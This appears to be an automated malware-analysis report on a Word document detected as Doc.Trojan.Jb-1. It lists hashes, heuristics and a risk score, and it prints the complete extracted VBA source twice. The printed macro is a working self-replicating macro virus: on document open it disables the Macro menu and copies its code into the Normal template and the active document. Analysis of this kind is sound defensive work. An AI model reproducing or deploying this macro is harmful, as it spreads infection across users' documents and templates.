Office (OLE) malware analysis — malicious · 0729a6816067a1ab

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-01-15 17:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 77c08a1327559fee90d9bc101a9795e8 SHA-1: 0574402e6b64b07f15b0d779062125bc6a4d589f SHA-256: 0729a6816067a1abbfd860f3d5093100ee83b8561847fa58b0d7049896045c3f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro attempts to infect both the Normal template and the active document by copying its code. This behavior suggests an attempt to establish persistence or prepare for a secondary payload, although the full script was truncated. The ClamAV detection 'Doc.Trojan.Jb-1' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Jb-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Jb-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2296 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2296 bytes
SHA-256: `513a9cb5d9fcf1f9a505eb513126f928a0e1bb0a83def1c59998103c7138aef0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JB" Attribute VB_Base = "1Normal.JB" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Dim prvInfNorm As Boolean Dim prvInfAct As Boolean Dim prvCodeCount As Integer Private Sub Document_Close() ActiveDocument.SaveAs ActiveDocument.FullName CommandBars("Macro").Enabled = True End Sub Private Sub Document_New() Document_Open End Sub Private Sub Document_Open() CommandBars("Macro").Enabled = False 'Check The Name of the Normal Template and Active Document Projects If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "JB" Then NormalTemplate.VBProject.VBComponents.Item(1).Name = "JB" prvInfNorm = True 'Infect Normal Else prvInfNorm = False ' Don't Infect Normal End If If ActiveDocument.VBProject.VBComponents.Item(1).Name <> "JB" Then ActiveDocument.VBProject.VBComponents.Item(1).Name = "JB" prvInfAct = True 'Infect Active Document Else prvInfAct = False 'Don't Infect Active Document End If 'Infecting the Normal Template If prvInfNorm = True Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines For prvCodeCount = 1 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1) Next prvCodeCount End If ' Infecting the Active Document If prvInfAct = True Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines For prvCodeCount = 1 To NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1) Next prvCodeCount End If End Sub

SHA-256: 513a9cb5d9fcf1f9a505eb513126f928a0e1bb0a83def1c59998103c7138aef0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JB"
Attribute VB_Base = "1Normal.JB"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Dim prvInfNorm As Boolean
Dim prvInfAct As Boolean
Dim prvCodeCount As Integer
Private Sub Document_Close()
    ActiveDocument.SaveAs ActiveDocument.FullName
    CommandBars("Macro").Enabled = True
End Sub

Private Sub Document_New()
    Document_Open
End Sub

Private Sub Document_Open()


    CommandBars("Macro").Enabled = False
    
    
    'Check The Name of the Normal Template and Active Document Projects
    If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "JB" Then
        NormalTemplate.VBProject.VBComponents.Item(1).Name = "JB"
        prvInfNorm = True 'Infect Normal
    Else
        prvInfNorm = False ' Don't Infect Normal
    End If
    If ActiveDocument.VBProject.VBComponents.Item(1).Name <> "JB" Then
        ActiveDocument.VBProject.VBComponents.Item(1).Name = "JB"
        prvInfAct = True 'Infect Active Document
    Else
        prvInfAct = False 'Don't Infect Active Document
    End If

    'Infecting the Normal Template
    If prvInfNorm = True Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        For prvCodeCount = 1 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1)
        Next prvCodeCount
    End If

    ' Infecting the Active Document
    If prvInfAct = True Then
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        For prvCodeCount = 1 To NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines prvCodeCount, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(prvCodeCount, 1)
        Next prvCodeCount
    End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.